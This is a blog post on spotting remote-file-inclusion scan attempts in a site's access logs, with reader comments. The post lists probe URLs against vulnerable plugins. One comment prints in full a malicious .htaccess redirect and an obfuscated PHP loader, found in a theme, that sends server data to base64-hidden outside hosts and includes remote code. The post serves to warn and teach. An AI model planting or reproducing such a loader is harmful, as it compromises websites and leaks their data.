Anatomy Of An Attack

In an effort to remove all invalid links and redirections from my site I’ve been paying very close attention to my access logs. Courtesy of the list that Redirection maintains I’ve noticed that my site has been under a prolonged attack.

No, there’s no panic just yet, and so far this is not something I’m worried about. The attacks appear to be part of a general ‘find any weakness in any website’ method, rather than a specific and directed attack. Let me give some details of the URLs that are being accessed:

/plugins/spamx/MTBlackList.Examine.class.php?_CONF%5bpath%5d=someURL

/wp-content/plugins/myflash/myflash-button.php?wpPATH=someURL

/wp-content/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=someURL

/wp-content/plugins/Enigma2.php?boarddir=someURL

There’s a couple of things wrong with these. The first is that the directory paths are all wrong and are assuming my site is using the default installation of WordPress, and even Movable Type. It’s not. The second is that they are trying to access plugins I don’t have. This tells me the attacks are just scanning for a weakness, rather than specifically targeting my site.

Looking at the attacks in more detail we can see that all of them are calling some PHP script and passing in a parameter to a remote site. Research into these plugins shows that they have been identified as being insecure. What is happening is that the attacker is exploiting a flaw in the plugin and forcing it to load a script from an external website. The script is then executed by your own web server, giving the attacker the keys to your kingdom, and allowing them to easily compromise your site. Nasty.

Fortunately none of the remote sites work, and the scripts are all unavailable. Unfortunately it doesn’t take much effort to locate sites where these scripts are available.

The moral of this story is twofold. Most importantly it is to always keep up-to-date with software (including plugins). Second is to keep an eye on your logs and be aware of what’s going on. This won’t give you any more protection, but as the proverb goes ‘forewarned is forearmed’.

4 comments

  1. Have you seen Alex King’s 404 Notifier? Kind of handy for keeping track of the weird URL’s that are feeding into your site. Though it does tend to fill up with 404’s from comment-XXXX from Akismet-blocked spam.

  2. Oops sorry I didn’t notice your own plugin tracks 404s and does additional handy stuff. Need to click through the links before commenting.

  3. I just discovered that one theme i’ve used generated some weird .htaccess files in my sub-dirs, which redirected the 404-page to a included script, which passed some bunch of my server-variables to 2 urls as querystrings. if this was aimed for statistics ıf usage, it is not a fine way to do it, without asking the owner first.

    this is the .htaccess found on various paths:
    Options -MultiViews
    ErrorDocument 404 //wp-content/themes/194773.php

    and this is the called script, which passes my datas to 2 base64 encoded urls. arent there many base64 decoders available online? do they think they are the only smart-asses? how lame!

    error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".
    base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str);}

  4. I agree that I wouldn’t be too happy with that information being sent somewhere. It’s not difficult to provide it as an option, or to even include it in a disclaimer.

Leave a comment

Your email address will not be published. Required fields are marked *